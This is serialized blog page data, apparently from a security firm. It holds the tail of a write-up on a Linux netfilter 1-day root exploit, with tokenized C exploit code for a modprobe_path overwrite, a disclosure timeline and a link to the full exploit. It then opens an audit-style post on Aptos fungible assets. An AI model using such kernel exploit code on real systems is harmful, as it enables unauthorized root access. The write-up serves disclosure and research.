",{"type":24,"tag":301,"props":67058,"children":67059},{"style":466},[67060],{"type":30,"value":67061},"32",{"type":24,"tag":301,"props":67063,"children":67064},{"style":359},[67065],{"type":30,"value":911},{"type":24,"tag":301,"props":67067,"children":67068},{"style":385},[67069],{"type":30,"value":1849},{"type":24,"tag":301,"props":67071,"children":67072},{"style":466},[67073],{"type":30,"value":685},{"type":24,"tag":301,"props":67075,"children":67076},{"style":359},[67077],{"type":30,"value":791},{"type":24,"tag":301,"props":67079,"children":67080},{"class":303,"line":3685},[67081],{"type":24,"tag":301,"props":67082,"children":67083},{"style":359},[67084],{"type":30,"value":38411},{"type":24,"tag":301,"props":67086,"children":67087},{"class":303,"line":3713},[67088,67092,67096,67100,67104,67109],{"type":24,"tag":301,"props":67089,"children":67090},{"style":314},[67091],{"type":30,"value":64615},{"type":24,"tag":301,"props":67093,"children":67094},{"style":359},[67095],{"type":30,"value":362},{"type":24,"tag":301,"props":67097,"children":67098},{"style":329},[67099],{"type":30,"value":9408},{"type":24,"tag":301,"props":67101,"children":67102},{"style":9400},[67103],{"type":30,"value":55111},{"type":24,"tag":301,"props":67105,"children":67106},{"style":329},[67107],{"type":30,"value":67108},"[-] write(pipe)\"",{"type":24,"tag":301,"props":67110,"children":67111},{"style":359},[67112],{"type":30,"value":589},{"type":24,"tag":301,"props":67114,"children":67115},{"class":303,"line":3721},[67116],{"type":24,"tag":301,"props":67117,"children":67118},{"style":359},[67119],{"type":30,"value":3345},{"type":24,"tag":301,"props":67121,"children":67122},{"class":303,"line":3751},[67123],{"type":24,"tag":301,"props":67124,"children":67125},{"emptyLinePlaceholder":16},[67126],{"type":30,"value":341},{"type":24,"tag":301,"props":67128,"children":67129},{"class":303,"line":3782},[67130,67134,67138,67143],{"type":24,"tag":301,"props":67131,"children":67132},{"style":308},[67133],{"type":30,"value":3285},{"type":24,"tag":301,"props":67135,"children":67136},{"style":359},[67137],{"type":30,"value":873},{"type":24,"tag":301,"props":67139,"children":67140},{"style":314},[67141],{"type":30,"value":67142},"check_modprobe",{"type":24,"tag":301,"props":67144,"children":67145},{"style":359},[67146],{"type":30,"value":67147},"(fd_path))\n",{"type":24,"tag":301,"props":67149,"children":67150},{"class":303,"line":3791},[67151],{"type":24,"tag":301,"props":67152,"children":67153},{"style":359},[67154],{"type":30,"value":38411},{"type":24,"tag":301,"props":67156,"children":67157},{"class":303,"line":3819},[67158,67163,67167,67172],{"type":24,"tag":301,"props":67159,"children":67160},{"style":314},[67161],{"type":30,"value":67162}," puts",{"type":24,"tag":301,"props":67164,"children":67165},{"style":359},[67166],{"type":30,"value":362},{"type":24,"tag":301,"props":67168,"children":67169},{"style":329},[67170],{"type":30,"value":67171},"\"[-] failed to overwrite modprobe\"",{"type":24,"tag":301,"props":67173,"children":67174},{"style":359},[67175],{"type":30,"value":589},{"type":24,"tag":301,"props":67177,"children":67178},{"class":303,"line":4397},[67179,67183],{"type":24,"tag":301,"props":67180,"children":67181},{"style":308},[67182],{"type":30,"value":10127},{"type":24,"tag":301,"props":67184,"children":67185},{"style":359},[67186],{"type":30,"value":492},{"type":24,"tag":301,"props":67188,"children":67189},{"class":303,"line":4405},[67190],{"type":24,"tag":301,"props":67191,"children":67192},{"style":359},[67193],{"type":30,"value":3345},{"type":24,"tag":301,"props":67195,"children":67196},{"class":303,"line":4422},[67197],{"type":24,"tag":301,"props":67198,"children":67199},{"emptyLinePlaceholder":16},[67200],{"type":30,"value":341},{"type":24,"tag":301,"props":67202,"children":67203},{"class":303,"line":4438},[67204,67208,67212,67217],{"type":24,"tag":301,"props":67205,"children":67206},{"style":308},[67207],{"type":30,"value":3285},{"type":24,"tag":301,"props":67209,"children":67210},{"style":359},[67211],{"type":30,"value":873},{"type":24,"tag":301,"props":67213,"children":67214},{"style":314},[67215],{"type":30,"value":67216},"trigger_modprobe",{"type":24,"tag":301,"props":67218,"children":67219},{"style":359},[67220],{"type":30,"value":67221},"(status_fd))\n",{"type":24,"tag":301,"props":67223,"children":67224},{"class":303,"line":4446},[67225],{"type":24,"tag":301,"props":67226,"children":67227},{"style":359},[67228],{"type":30,"value":38411},{"type":24,"tag":301,"props":67230,"children":67231},{"class":303,"line":4506},[67232,67236,67240,67244,67248,67253],{"type":24,"tag":301,"props":67233,"children":67234},{"style":314},[67235],{"type":30,"value":67162},{"type":24,"tag":301,"props":67237,"children":67238},{"style":359},[67239],{"type":30,"value":362},{"type":24,"tag":301,"props":67241,"children":67242},{"style":329},[67243],{"type":30,"value":9408},{"type":24,"tag":301,"props":67245,"children":67246},{"style":9400},[67247],{"type":30,"value":55111},{"type":24,"tag":301,"props":67249,"children":67250},{"style":329},[67251],{"type":30,"value":67252},"[+] got root\"",{"type":24,"tag":301,"props":67254,"children":67255},{"style":359},[67256],{"type":30,"value":589},{"type":24,"tag":301,"props":67258,"children":67259},{"class":303,"line":4566},[67260,67265],{"type":24,"tag":301,"props":67261,"children":67262},{"style":308},[67263],{"type":30,"value":67264}," goto",{"type":24,"tag":301,"props":67266,"children":67267},{"style":359},[67268],{"type":30,"value":67269}," out;\n",{"type":24,"tag":301,"props":67271,"children":67272},{"class":303,"line":4574},[67273],{"type":24,"tag":301,"props":67274,"children":67275},{"style":359},[67276],{"type":30,"value":3345},{"type":24,"tag":301,"props":67278,"children":67279},{"class":303,"line":4590},[67280],{"type":24,"tag":301,"props":67281,"children":67282},{"emptyLinePlaceholder":16},[67283],{"type":30,"value":341},{"type":24,"tag":301,"props":67285,"children":67286},{"class":303,"line":4599},[67287,67291,67295,67299,67303,67307,67311,67315,67319,67324,67328],{"type":24,"tag":301,"props":67288,"children":67289},{"style":308},[67290],{"type":30,"value":3979},{"type":24,"tag":301,"props":67292,"children":67293},{"style":359},[67294],{"type":30,"value":873},{"type":24,"tag":301,"props":67296,"children":67297},{"style":348},[67298],{"type":30,"value":351},{"type":24,"tag":301,"props":67300,"children":67301},{"style":359},[67302],{"type":30,"value":1998},{"type":24,"tag":301,"props":67304,"children":67305},{"style":385},[67306],{"type":30,"value":523},{"type":24,"tag":301,"props":67308,"children":67309},{"style":466},[67310],{"type":30,"value":685},{"type":24,"tag":301,"props":67312,"children":67313},{"style":359},[67314],{"type":30,"value":1844},{"type":24,"tag":301,"props":67316,"children":67317},{"style":385},[67318],{"type":30,"value":1849},{"type":24,"tag":301,"props":67320,"children":67321},{"style":359},[67322],{"type":30,"value":67323}," SKBUF_SPRAY; i",{"type":24,"tag":301,"props":67325,"children":67326},{"style":385},[67327],{"type":30,"value":1859},{"type":24,"tag":301,"props":67329,"children":67330},{"style":359},[67331],{"type":30,"value":791},{"type":24,"tag":301,"props":67333,"children":67334},{"class":303,"line":4629},[67335],{"type":24,"tag":301,"props":67336,"children":67337},{"style":359},[67338],{"type":30,"value":38411},{"type":24,"tag":301,"props":67340,"children":67341},{"class":303,"line":4659},[67342,67346,67350,67355,67359,67364,67368,67372,67377,67381,67385,67390,67394,67398,67402],{"type":24,"tag":301,"props":67343,"children":67344},{"style":308},[67345],{"type":30,"value":65516},{"type":24,"tag":301,"props":67347,"children":67348},{"style":359},[67349],{"type":30,"value":873},{"type":24,"tag":301,"props":67351,"children":67352},{"style":314},[67353],{"type":30,"value":67354},"read",{"type":24,"tag":301,"props":67356,"children":67357},{"style":359},[67358],{"type":30,"value":362},{"type":24,"tag":301,"props":67360,"children":67361},{"style":369},[67362],{"type":30,"value":67363},"sock",{"type":24,"tag":301,"props":67365,"children":67366},{"style":359},[67367],{"type":30,"value":1877},{"type":24,"tag":301,"props":67369,"children":67370},{"style":466},[67371],{"type":30,"value":546},{"type":24,"tag":301,"props":67373,"children":67374},{"style":359},[67375],{"type":30,"value":67376},"], leak, ",{"type":24,"tag":301,"props":67378,"children":67379},{"style":466},[67380],{"type":30,"value":5154},{"type":24,"tag":301,"props":67382,"children":67383},{"style":385},[67384],{"type":30,"value":3407},{"type":24,"tag":301,"props":67386,"children":67387},{"style":466},[67388],{"type":30,"value":67389}," 320",{"type":24,"tag":301,"props":67391,"children":67392},{"style":359},[67393],{"type":30,"value":911},{"type":24,"tag":301,"props":67395,"children":67396},{"style":385},[67397],{"type":30,"value":1849},{"type":24,"tag":301,"props":67399,"children":67400},{"style":466},[67401],{"type":30,"value":685},{"type":24,"tag":301,"props":67403,"children":67404},{"style":359},[67405],{"type":30,"value":791},{"type":24,"tag":301,"props":67407,"children":67408},{"class":303,"line":4668},[67409],{"type":24,"tag":301,"props":67410,"children":67411},{"style":359},[67412],{"type":30,"value":38447},{"type":24,"tag":301,"props":67414,"children":67415},{"class":303,"line":4677},[67416,67421,67425,67430],{"type":24,"tag":301,"props":67417,"children":67418},{"style":314},[67419],{"type":30,"value":67420}," perror",{"type":24,"tag":301,"props":67422,"children":67423},{"style":359},[67424],{"type":30,"value":362},{"type":24,"tag":301,"props":67426,"children":67427},{"style":329},[67428],{"type":30,"value":67429},"\"[-] read(socket)\"",{"type":24,"tag":301,"props":67431,"children":67432},{"style":359},[67433],{"type":30,"value":589},{"type":24,"tag":301,"props":67435,"children":67436},{"class":303,"line":4697},[67437,67442,67446,67450],{"type":24,"tag":301,"props":67438,"children":67439},{"style":308},[67440],{"type":30,"value":67441}," return",{"type":24,"tag":301,"props":67443,"children":67444},{"style":385},[67445],{"type":30,"value":3407},{"type":24,"tag":301,"props":67447,"children":67448},{"style":466},[67449],{"type":30,"value":546},{"type":24,"tag":301,"props":67451,"children":67452},{"style":359},[67453],{"type":30,"value":492},{"type":24,"tag":301,"props":67455,"children":67456},{"class":303,"line":4725},[67457],{"type":24,"tag":301,"props":67458,"children":67459},{"style":359},[67460],{"type":30,"value":65600},{"type":24,"tag":301,"props":67462,"children":67463},{"class":303,"line":4733},[67464],{"type":24,"tag":301,"props":67465,"children":67466},{"style":359},[67467],{"type":30,"value":3345},{"type":24,"tag":301,"props":67469,"children":67470},{"class":303,"line":4741},[67471],{"type":24,"tag":301,"props":67472,"children":67473},{"style":359},[67474],{"type":30,"value":501},{"type":24,"tag":301,"props":67476,"children":67477},{"class":303,"line":4757},[67478,67482,67486,67491],{"type":24,"tag":301,"props":67479,"children":67480},{"style":314},[67481],{"type":30,"value":62229},{"type":24,"tag":301,"props":67483,"children":67484},{"style":359},[67485],{"type":30,"value":362},{"type":24,"tag":301,"props":67487,"children":67488},{"style":329},[67489],{"type":30,"value":67490},"\"[-] fake modprobe failed\"",{"type":24,"tag":301,"props":67492,"children":67493},{"style":359},[67494],{"type":30,"value":589},{"type":24,"tag":301,"props":67496,"children":67497},{"class":303,"line":4765},[67498],{"type":24,"tag":301,"props":67499,"children":67500},{"style":359},[67501],{"type":30,"value":17123},{"type":24,"tag":32,"props":67503,"children":67504},{},[67505,67507,67514],{"type":30,"value":67506},"This trick has already been throughly detailed by ",{"type":24,"tag":188,"props":67508,"children":67511},{"href":67509,"rel":67510},"https://pwning.tech/nftables/#28-overwriting-modprobepath",[192],[67512],{"type":30,"value":67513},"lau",{"type":30,"value":67515},", so we won't go much more into it.",{"type":24,"tag":80,"props":67517,"children":67519},{"id":67518},"universal-exploit-demo",[67520],{"type":30,"value":67521},"Universal exploit demo",{"type":24,"tag":32,"props":67523,"children":67524},{},[67525,67527,67533],{"type":30,"value":67526},"{%youtube tjbp4Mtfo8w %}\nYou can find the complete universal exploit in our ",{"type":24,"tag":188,"props":67528,"children":67531},{"href":67529,"rel":67530},"https://github.com/otter-sec/OtterRoot/blob/master/universal/exploit.c",[192],[67532],{"type":30,"value":64133},{"type":30,"value":206},{"type":24,"tag":43,"props":67535,"children":67537},{"id":67536},"disclosure-timeline",[67538],{"type":30,"value":67539},"Disclosure Timeline",{"type":24,"tag":2655,"props":67541,"children":67542},{},[67543,67548,67553,67558,67563],{"type":24,"tag":2659,"props":67544,"children":67545},{},[67546],{"type":30,"value":67547},"March 21st -- Patch made public",{"type":24,"tag":2659,"props":67549,"children":67550},{},[67551],{"type":30,"value":67552},"March 23rd -- Scrolled through commits and found the bug fix.",{"type":24,"tag":2659,"props":67554,"children":67555},{},[67556],{"type":30,"value":67557},"March 24th -- Wrote KernelCTF exploit",{"type":24,"tag":2659,"props":67559,"children":67560},{},[67561],{"type":30,"value":67562},"March 26th -- Wrote Universal exploit",{"type":24,"tag":2659,"props":67564,"children":67565},{},[67566],{"type":30,"value":67567},"May 23rd -- Patch landed on Ubuntu and Debian",{"type":24,"tag":32,"props":67569,"children":67570},{},[67571],{"type":30,"value":67572},"Note that the universal exploit was alive for roughly 2 months against popular distros.",{"type":24,"tag":43,"props":67574,"children":67575},{"id":9652},[67576],{"type":30,"value":9655},{"type":24,"tag":32,"props":67578,"children":67579},{},[67580],{"type":30,"value":67581},"In this post, I have discussed how a bug fixed by a commit freshly made public can be used to exploit the latest stable releases of the kernel and maintain 0day-like primitives for an extended period. I've also discussed two different paths to exploit the vulnerability: one that I used to exploit the KernelCTF instance and retrieve the flag and a second one that I used to craft a universal exploit binary that works stably in all tested targets without needing to be adapted or even recompiled.",{"type":24,"tag":32,"props":67583,"children":67584},{},[67585],{"type":30,"value":67586},"What we have observed is not novel; despite the efforts and progress made by the Linux community to improve kernel security, it's been made evident that the supply of exploitable bugs is still virtually unlimited and that the open-source patch gap is long enough to maintain capabilities that are live.",{"type":24,"tag":9672,"props":67588,"children":67589},{},[67590],{"type":30,"value":9676},{"title":7,"searchDepth":320,"depth":320,"links":67592},[67593,67596,67599,67602,67603,67613,67621,67622],{"id":57298,"depth":320,"text":57301,"children":67594},[67595],{"id":57318,"depth":335,"text":57321},{"id":57361,"depth":320,"text":57361,"children":67597},[67598],{"id":57408,"depth":335,"text":57411},{"id":57466,"depth":320,"text":57469,"children":67600},[67601],{"id":58624,"depth":335,"text":58627},{"id":60498,"depth":320,"text":60501},{"id":60900,"depth":320,"text":60903,"children":67604},[67605,67606,67607,67609,67610,67611,67612],{"id":60927,"depth":335,"text":60930},{"id":61807,"depth":335,"text":61810},{"id":62392,"depth":335,"text":67608},"Leaking self pointer of nft_object",{"id":62788,"depth":335,"text":62791},{"id":63302,"depth":335,"text":63305},{"id":63432,"depth":335,"text":63089},{"id":64114,"depth":335,"text":64117},{"id":64137,"depth":320,"text":64140,"children":67614},[67615,67616,67617,67618,67620],{"id":64148,"depth":335,"text":64151},{"id":65003,"depth":335,"text":65006},{"id":65079,"depth":335,"text":65082},{"id":66703,"depth":335,"text":67619},"Overwriting modprobe_path",{"id":67518,"depth":335,"text":67521},{"id":67536,"depth":320,"text":67539},{"id":9652,"depth":320,"text":9655},"content:blog:2024-11-25-netfilter-universal-root-1-day.md","blog/2024-11-25-netfilter-universal-root-1-day.md","blog/2024-11-25-netfilter-universal-root-1-day",{"_path":67627,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":67628,"description":67629,"image":67630,"date":67632,"isFeatured":16,"onBlogPage":16,"tags":67633,"body":67634,"_type":9700,"_id":74350,"_source":9702,"_file":74351,"_stem":74352,"_extension":9705},"/blog/2025-02-10-hitchhikers-guide-to-aptos-fungible-assets","Hitchhiker's Guide to Aptos Fungible Assets","We take a deep dive into Aptos’ implementation of fungible assets, exploring the intricacies hidden within its functions, objects, and interactions. While the Fungible Asset model was designed to address the limitations and security flaws of the legacy Coin standard, it also introduced new challenges and vulnerabilities that developers should be aware of.",{"src":67631,"width":12208,"height":12209},"/posts/aptos-guide/title.png","2025-02-10",[12699],{"type":21,"children":67635,"toc":74334},[67636,67649,67654,67663,67669,67697,67770,67810,67844,68005,68024,68105,68145,68173,68190,68195,68203,68208,68214,68235,68315,68348,68356,68369,68374,68757,68762,68767,68773,68778,68790,68894,68932,68935,68953,69261,69266,69278,69284,69310,69331,69336,69515,69535,69541,69561,69573,69578,69584,69596,69659,69686,69710,69931,69934,69953,70063,70120,70256,70283,70289,70315,70559,70587,70889,70922,70935,70961,70994,71301,71313,71590,71604,71921,71940,71946,71978,72018,72119,72139,72259,72276,72350,72362,72450,72471,72477,72482,72487,72504,72525,72896,72955,72960,73411,73416,73452,73458,73470,73492,73518,73725,73739,73994,74006,74033,74184,74203,74233,74237,74248,74253,74266,74330],{"type":24,"tag":32,"props":67637,"children":67638},{},[67639,67641,67647],{"type":30,"value":67640},"Aptos’ fungible asset model is a complex component of its ecosystem, designed to address the limitations of its predecessor — the ",{"type":24,"tag":145,"props":67642,"children":67644},{"className":67643},[],[67645],{"type":30,"value":67646},"coin",{"type":30,"value":67648}," standard. While the new model aims to enhance functionality and security, it also comes with its own set of challenges.",{"type":24,"tag":32,"props":67650,"children":67651},{},[67652],{"type":30,"value":67653},"In this blog post, we'll closely examine Aptos's coin and fungible asset models, exploring their history and connection. We will examine key aspects of the fungible asset framework, including real-world examples of vulnerabilities that were identified and addressed, with the goal of improving security and reliability — all to help you build more secure and reliable applications.",{"type":24,"tag":67655,"props":67656,"children":67657},"important",{},[67658],{"type":24,"tag":32,"props":67659,"children":67660},{},[67661],{"type":30,"value":67662},"All issues mentioned were identified and addressed during Aptos' rigorous pre-release audits, demonstrating the project's dedication to delivering a robust and secure environment from day one.",{"type":24,"tag":43,"props":67664,"children":67666},{"id":67665},"aptos-coin-standard",[67667],{"type":30,"value":67668},"Aptos Coin standard",{"type":24,"tag":32,"props":67670,"children":67671},{},[67672,67674,67680,67682,67687,67688,67695],{"type":30,"value":67673},"In the beginning, Aptos used ",{"type":24,"tag":145,"props":67675,"children":67677},{"className":67676},[],[67678],{"type":30,"value":67679},"Coin",{"type":30,"value":67681},". It is still in use, although it is now considered \"legacy\". ",{"type":24,"tag":145,"props":67683,"children":67685},{"className":67684},[],[67686],{"type":30,"value":67679},{"type":30,"value":5945},{"type":24,"tag":188,"props":67689,"children":67692},{"href":67690,"rel":67691},"https://github.com/aptos-labs/aptos-core/blob/1381c93fd5a656f16fb326d4ffe371947554a330/aptos-move/framework/aptos-framework/sources/coin.move#L119-L123",[192],[67693],{"type":30,"value":67694},"defined",{"type":30,"value":67696}," in Aptos as follows:",{"type":24,"tag":291,"props":67698,"children":67700},{"className":9818,"code":67699,"language":9817,"meta":7,"style":7},"struct Coin\u003Cphantom CoinType> has store {\n value: u64,\n}\n",[67701],{"type":24,"tag":145,"props":67702,"children":67703},{"__ignoreMap":7},[67704,67743,67763],{"type":24,"tag":301,"props":67705,"children":67706},{"class":303,"line":304},[67707,67711,67715,67719,67723,67727,67731,67735,67739],{"type":24,"tag":301,"props":67708,"children":67709},{"style":348},[67710],{"type":30,"value":3010},{"type":24,"tag":301,"props":67712,"children":67713},{"style":10246},[67714],{"type":30,"value":12622},{"type":24,"tag":301,"props":67716,"children":67717},{"style":359},[67718],{"type":30,"value":1849},{"type":24,"tag":301,"props":67720,"children":67721},{"style":369},[67722],{"type":30,"value":12631},{"type":24,"tag":301,"props":67724,"children":67725},{"style":10246},[67726],{"type":30,"value":12636},{"type":24,"tag":301,"props":67728,"children":67729},{"style":359},[67730],{"type":30,"value":12641},{"type":24,"tag":301,"props":67732,"children":67733},{"style":369},[67734],{"type":30,"value":12646},{"type":24,"tag":301,"props":67736,"children":67737},{"style":369},[67738],{"type":30,"value":12651},{"type":24,"tag":301,"props":67740,"children":67741},{"style":359},[67742],{"type":30,"value":3035},{"type":24,"tag":301,"props":67744,"children":67745},{"class":303,"line":320},[67746,67751,67755,67759],{"type":24,"tag":301,"props":67747,"children":67748},{"style":369},[67749],{"type":30,"value":67750}," value",{"type":24,"tag":301,"props":67752,"children":67753},{"style":385},[67754],{"type":30,"value":1679},{"type":24,"tag":301,"props":67756,"children":67757},{"style":10246},[67758],{"type":30,"value":12680},{"type":24,"tag":301,"props":67760,"children":67761},{"style":359},[67762],{"type":30,"value":1729},{"type":24,"tag":301,"props":67764,"children":67765},{"class":303,"line":335},[67766],{"type":24,"tag":301,"props":67767,"children":67768},{"style":359},[67769],{"type":30,"value":698},{"type":24,"tag":32,"props":67771,"children":67772},{},[67773,67775,67780,67782,67788,67789,67795,67797,67802,67804,67809],{"type":30,"value":67774},"Aptos distinguishes coins by their type (",{"type":24,"tag":145,"props":67776,"children":67778},{"className":67777},[],[67779],{"type":30,"value":13402},{"type":30,"value":67781},") at compile time. For example, ",{"type":24,"tag":145,"props":67783,"children":67785},{"className":67784},[],[67786],{"type":30,"value":67787},"Coin\u003COtter>",{"type":30,"value":2378},{"type":24,"tag":145,"props":67790,"children":67792},{"className":67791},[],[67793],{"type":30,"value":67794},"Coin\u003CWeasel>",{"type":30,"value":67796}," represent different coins, and you cannot pass a ",{"type":24,"tag":145,"props":67798,"children":67800},{"className":67799},[],[67801],{"type":30,"value":67794},{"type":30,"value":67803}," to a function expecting ",{"type":24,"tag":145,"props":67805,"children":67807},{"className":67806},[],[67808],{"type":30,"value":67787},{"type":30,"value":206},{"type":24,"tag":32,"props":67811,"children":67812},{},[67813,67815,67820,67822,67827,67829,67834,67836,67842],{"type":30,"value":67814},"The type signature reveals why ",{"type":24,"tag":145,"props":67816,"children":67818},{"className":67817},[],[67819],{"type":30,"value":67679},{"type":30,"value":67821}," has become a legacy standard. ",{"type":24,"tag":145,"props":67823,"children":67825},{"className":67824},[],[67826],{"type":30,"value":67679},{"type":30,"value":67828}," has only the ",{"type":24,"tag":145,"props":67830,"children":67832},{"className":67831},[],[67833],{"type":30,"value":12760},{"type":30,"value":67835}," ability and uses a ",{"type":24,"tag":145,"props":67837,"children":67839},{"className":67838},[],[67840],{"type":30,"value":67841},"CoinStore",{"type":30,"value":67843}," wrapper to store the coin and metadata:",{"type":24,"tag":291,"props":67845,"children":67847},{"className":9818,"code":67846,"language":9817,"meta":7,"style":7},"struct CoinStore\u003Cphantom CoinType> has key {\n coin: Coin\u003CCoinType>,\n frozen: bool,\n deposit_events: EventHandle\u003CDepositEvent>,\n withdraw_events: EventHandle\u003CWithdrawEvent>,\n}\n",[67848],{"type":24,"tag":145,"props":67849,"children":67850},{"__ignoreMap":7},[67851,67891,67919,67939,67969,67998],{"type":24,"tag":301,"props":67852,"children":67853},{"class":303,"line":304},[67854,67858,67863,67867,67871,67875,67879,67883,67887],{"type":24,"tag":301,"props":67855,"children":67856},{"style":348},[67857],{"type":30,"value":3010},{"type":24,"tag":301,"props":67859,"children":67860},{"style":10246},[67861],{"type":30,"value":67862}," CoinStore",{"type":24,"tag":301,"props":67864,"children":67865},{"style":359},[67866],{"type":30,"value":1849},{"type":24,"tag":301,"props":67868,"children":67869},{"style":369},[67870],{"type":30,"value":12631},{"type":24,"tag":301,"props":67872,"children":67873},{"style":10246},[67874],{"type":30,"value":12636},{"type":24,"tag":301,"props":67876,"children":67877},{"style":359},[67878],{"type":30,"value":12641},{"type":24,"tag":301,"props":67880,"children":67881},{"style":369},[67882],{"type":30,"value":12646},{"type":24,"tag":301,"props":67884,"children":67885},{"style":369},[67886],{"type":30,"value":12751},{"type":24,"tag":301,"props":67888,"children":67889},{"style":359},[67890],{"type":30,"value":3035},{"type":24,"tag":301,"props":67892,"children":67893},{"class":303,"line":320},[67894,67899,67903,67907,67911,67915],{"type":24,"tag":301,"props":67895,"children":67896},{"style":369},[67897],{"type":30,"value":67898}," coin",{"type":24,"tag":301,"props":67900,"children":67901},{"style":385},[67902],{"type":30,"value":1679},{"type":24,"tag":301,"props":67904,"children":67905},{"style":10246},[67906],{"type":30,"value":12622},{"type":24,"tag":301,"props":67908,"children":67909},{"style":359},[67910],{"type":30,"value":1849},{"type":24,"tag":301,"props":67912,"children":67913},{"style":10246},[67914],{"type":30,"value":13402},{"type":24,"tag":301,"props":67916,"children":67917},{"style":359},[67918],{"type":30,"value":12957},{"type":24,"tag":301,"props":67920,"children":67921},{"class":303,"line":335},[67922,67927,67931,67935],{"type":24,"tag":301,"props":67923,"children":67924},{"style":369},[67925],{"type":30,"value":67926}," frozen",{"type":24,"tag":301,"props":67928,"children":67929},{"style":385},[67930],{"type":30,"value":1679},{"type":24,"tag":301,"props":67932,"children":67933},{"style":10246},[67934],{"type":30,"value":18848},{"type":24,"tag":301,"props":67936,"children":67937},{"style":359},[67938],{"type":30,"value":1729},{"type":24,"tag":301,"props":67940,"children":67941},{"class":303,"line":344},[67942,67947,67951,67956,67960,67965],{"type":24,"tag":301,"props":67943,"children":67944},{"style":369},[67945],{"type":30,"value":67946}," deposit_events",{"type":24,"tag":301,"props":67948,"children":67949},{"style":385},[67950],{"type":30,"value":1679},{"type":24,"tag":301,"props":67952,"children":67953},{"style":10246},[67954],{"type":30,"value":67955}," EventHandle",{"type":24,"tag":301,"props":67957,"children":67958},{"style":359},[67959],{"type":30,"value":1849},{"type":24,"tag":301,"props":67961,"children":67962},{"style":10246},[67963],{"type":30,"value":67964},"DepositEvent",{"type":24,"tag":301,"props":67966,"children":67967},{"style":359},[67968],{"type":30,"value":12957},{"type":24,"tag":301,"props":67970,"children":67971},{"class":303,"line":401},[67972,67977,67981,67985,67989,67994],{"type":24,"tag":301,"props":67973,"children":67974},{"style":369},[67975],{"type":30,"value":67976}," withdraw_events",{"type":24,"tag":301,"props":67978,"children":67979},{"style":385},[67980],{"type":30,"value":1679},{"type":24,"tag":301,"props":67982,"children":67983},{"style":10246},[67984],{"type":30,"value":67955},{"type":24,"tag":301,"props":67986,"children":67987},{"style":359},[67988],{"type":30,"value":1849},{"type":24,"tag":301,"props":67990,"children":67991},{"style":10246},[67992],{"type":30,"value":67993},"WithdrawEvent",{"type":24,"tag":301,"props":67995,"children":67996},{"style":359},[67997],{"type":30,"value":12957},{"type":24,"tag":301,"props":67999,"children":68000},{"class":303,"line":415},[68001],{"type":24,"tag":301,"props":68002,"children":68003},{"style":359},[68004],{"type":30,"value":698},{"type":24,"tag":32,"props":68006,"children":68007},{},[68008,68010,68015,68017,68022],{"type":30,"value":68009},"However, an astute reader would note that this isn't the only place a ",{"type":24,"tag":145,"props":68011,"children":68013},{"className":68012},[],[68014],{"type":30,"value":67679},{"type":30,"value":68016}," can be stored. You can create your own ",{"type":24,"tag":145,"props":68018,"children":68020},{"className":68019},[],[68021],{"type":30,"value":67679},{"type":30,"value":68023}," wallet, which could look like this:",{"type":24,"tag":291,"props":68025,"children":68027},{"className":9818,"code":68026,"language":9817,"meta":7,"style":7},"struct DefinitelyLegitCoinStore\u003Cphantom CoinType> has key {\n coin: Coin\u003CCoinType>\n}\n",[68028],{"type":24,"tag":145,"props":68029,"children":68030},{"__ignoreMap":7},[68031,68071,68098],{"type":24,"tag":301,"props":68032,"children":68033},{"class":303,"line":304},[68034,68038,68043,68047,68051,68055,68059,68063,68067],{"type":24,"tag":301,"props":68035,"children":68036},{"style":348},[68037],{"type":30,"value":3010},{"type":24,"tag":301,"props":68039,"children":68040},{"style":10246},[68041],{"type":30,"value":68042}," DefinitelyLegitCoinStore",{"type":24,"tag":301,"props":68044,"children":68045},{"style":359},[68046],{"type":30,"value":1849},{"type":24,"tag":301,"props":68048,"children":68049},{"style":369},[68050],{"type":30,"value":12631},{"type":24,"tag":301,"props":68052,"children":68053},{"style":10246},[68054],{"type":30,"value":12636},{"type":24,"tag":301,"props":68056,"children":68057},{"style":359},[68058],{"type":30,"value":12641},{"type":24,"tag":301,"props":68060,"children":68061},{"style":369},[68062],{"type":30,"value":12646},{"type":24,"tag":301,"props":68064,"children":68065},{"style":369},[68066],{"type":30,"value":12751},{"type":24,"tag":301,"props":68068,"children":68069},{"style":359},[68070],{"type":30,"value":3035},{"type":24,"tag":301,"props":68072,"children":68073},{"class":303,"line":320},[68074,68078,68082,68086,68090,68094],{"type":24,"tag":301,"props":68075,"children":68076},{"style":369},[68077],{"type":30,"value":67898},{"type":24,"tag":301,"props":68079,"children":68080},{"style":385},[68081],{"type":30,"value":1679},{"type":24,"tag":301,"props":68083,"children":68084},{"style":10246},[68085],{"type":30,"value":12622},{"type":24,"tag":301,"props":68087,"children":68088},{"style":359},[68089],{"type":30,"value":1849},{"type":24,"tag":301,"props":68091,"children":68092},{"style":10246},[68093],{"type":30,"value":13402},{"type":24,"tag":301,"props":68095,"children":68096},{"style":359},[68097],{"type":30,"value":12812},{"type":24,"tag":301,"props":68099,"children":68100},{"class":303,"line":335},[68101],{"type":24,"tag":301,"props":68102,"children":68103},{"style":359},[68104],{"type":30,"value":698},{"type":24,"tag":32,"props":68106,"children":68107},{},[68108,68113,68115,68121,68123,68128,68130,68136,68138,68143],{"type":24,"tag":145,"props":68109,"children":68111},{"className":68110},[],[68112],{"type":30,"value":67841},{"type":30,"value":68114}," includes a ",{"type":24,"tag":145,"props":68116,"children":68118},{"className":68117},[],[68119],{"type":30,"value":68120},"frozen",{"type":30,"value":68122}," field, allowing the issuer to block transfers to and from the store. ",{"type":24,"tag":145,"props":68124,"children":68126},{"className":68125},[],[68127],{"type":30,"value":67841},{"type":30,"value":68129}," is also required for a ",{"type":24,"tag":145,"props":68131,"children":68133},{"className":68132},[],[68134],{"type":30,"value":68135},"burn_from",{"type":30,"value":68137}," operation, which withdraws the ",{"type":24,"tag":145,"props":68139,"children":68141},{"className":68140},[],[68142],{"type":30,"value":67646},{"type":30,"value":68144}," from the store and destroys it. Freezing and burning operations are essential i.e. for stablecoin issuers, using them as compliance tools to prevent unauthorized or illegal transactions and adhere to legal orders. Being able to bypass these restrictions with a custom wallet is an issue and can lead to severe consequences.",{"type":24,"tag":32,"props":68146,"children":68147},{},[68148,68150,68155,68157,68164,68166,68171],{"type":30,"value":68149},"Storing ",{"type":24,"tag":145,"props":68151,"children":68153},{"className":68152},[],[68154],{"type":30,"value":67646},{"type":30,"value":68156}," in a custom wallet is also a problem in terms of off-chain observability, as finding the stored coins in such setup is a difficult task. This is how the fungible asset 